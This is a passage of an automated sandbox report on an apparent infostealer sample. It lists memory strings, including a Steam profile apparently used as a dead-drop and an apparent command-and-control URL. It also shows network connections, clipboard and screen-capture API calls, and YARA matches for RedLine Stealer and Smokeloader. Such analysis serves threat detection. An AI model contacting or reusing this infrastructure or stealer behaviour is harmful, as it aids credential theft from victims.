                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373734520.0000000000932000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000930000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/j
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                  Source: 1A68.tmp.exe, 00000003.00000002.2433623776.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                  Source: 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: 1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/api
                  Source: 1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/~
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433836788.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                  Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.6:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.6:49752 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49759 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49768 version: TLS 1.2
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024C1942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_024C1942
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00431839

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 00000003.00000002.2433571436.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.4623077365.00000000009F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024C2361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_024C2361
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024C2605 NtdllDefWindowProc_W,PostQuitMessage,0_2_024C2605
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004071AB0_2_004071AB
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004373D90_2_004373D9
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0042D4EE0_2_0042D4EE
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004274840_2_00427484
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004285600_2_00428560
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0043D6780_2_0043D678
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004166AF0_2_004166AF
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004137250_2_00413725
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0040E9740_2_0040E974
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0042EAE00_2_0042EAE0
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_00418AAF0_2_00418AAF
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_00436CBF0_2_00436CBF
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_00413F0B0_2_00413F0B
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024EED470_2_024EED47
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024D41720_2_024D4172
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024E76EB0_2_024E76EB
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024ED7550_2_024ED755
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024E87C70_2_024E87C7
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024CEBDB0_2_024CEBDB
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024D69160_2_024D6916
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024D398C0_2_024D398C
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024F6F260_2_024F6F26
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024EED470_2_024EED47
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024D8D160_2_024D8D16
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0040B44C3_2_0040B44C
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004087903_2_00408790
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004260543_2_00426054
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043B0683_2_0043B068
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004140703_2_00414070
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043C0203_2_0043C020
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004398303_2_00439830
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043D8303_2_0043D830
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041B0E13_2_0041B0E1
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041F0E03_2_0041F0E0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004210E03_2_004210E0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004358903_2_00435890
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004340983_2_00434098
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043D0A03_2_0043D0A0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004180A93_2_004180A9
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0040A9403_2_0040A940
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041714B3_2_0041714B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0040C9173_2_0040C917
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042B12C3_2_0042B12C
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042F1303_2_0042F130
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042B1C03_2_0042B1C0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041D9E03_2_0041D9E0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004361E03_2_004361E0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004111E53_2_004111E5
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004059F03_2_004059F0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004239F23_2_004239F2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043C1F03_2_0043C1F0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0040F9FD3_2_0040F9FD
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004259903_2_00425990
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043B9A13_2_0043B9A1
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004062503_2_00406250
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041D2703_2_0041D270
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00424A743_2_00424A74
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004092303_2_00409230
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00423A343_2_00423A34
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004192DA3_2_004192DA
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043D2F03_2_0043D2F0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043C2803_2_0043C280
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004152983_2_00415298
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004082AE3_2_004082AE
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004252BA3_2_004252BA
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041CB053_2_0041CB05
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00428BC03_2_00428BC0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004143C23_2_004143C2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00402BD03_2_00402BD0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00428BE93_2_00428BE9
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004373993_2_00437399
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004393A03_2_004393A0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00416BA53_2_00416BA5
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004293AA3_2_004293AA
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004223B83_2_004223B8
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00436C003_2_00436C00
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004234103_2_00423410
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042B4FC3_2_0042B4FC
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00404CB03_2_00404CB0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004074B03_2_004074B0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041DD503_2_0041DD50
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004185783_2_00418578
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042D57E3_2_0042D57E
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004245023_2_00424502
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00421D103_2_00421D10
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0040DD253_2_0040DD25
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041D5E03_2_0041D5E0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004175823_2_00417582
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043D5803_2_0043D580
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00427DA23_2_00427DA2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004205B03_2_004205B0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042C64A3_2_0042C64A
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00426E503_2_00426E50
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042B4F73_2_0042B4F7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043462A3_2_0043462A
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004356303_2_00435630
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004066E03_2_004066E0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042C6E43_2_0042C6E4
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00430EF03_2_00430EF0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004256F93_2_004256F9
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00422E933_2_00422E93
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00425E903_2_00425E90
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004156A03_2_004156A0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041BEA03_2_0041BEA0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00438EA03_2_00438EA0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00435EA03_2_00435EA0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00405EB03_2_00405EB0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041C6BB3_2_0041C6BB
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00415F663_2_00415F66
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004197703_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_004097003_2_00409700
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042C7263_2_0042C726
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0042C7353_2_0042C735
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0041DF803_2_0041DF80
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00402FA03_2_00402FA0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024932073_2_02493207
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024CB2CF3_2_024CB2CF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C42FF3_2_024C42FF
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024A734A3_2_024A734A
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024AB3483_2_024AB348
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024B13473_2_024B1347
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024AF3473_2_024AF347
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024CD3073_2_024CD307
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024983C73_2_024983C7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024BB3933_2_024BB393
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024BF3973_2_024BF397
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024A73B23_2_024A73B2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024B80093_2_024B8009
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0249C0E83_2_0249C0E8
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C11573_2_024C1157
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024B81083_2_024B8108
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C91073_2_024C9107
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C61073_2_024C6107
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024961173_2_02496117
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024AE1E73_2_024AE1E7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024AC1AC3_2_024AC1AC
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024C96073_2_024C9607
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024B96113_2_024B9611
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_024BB7633_2_024BB763
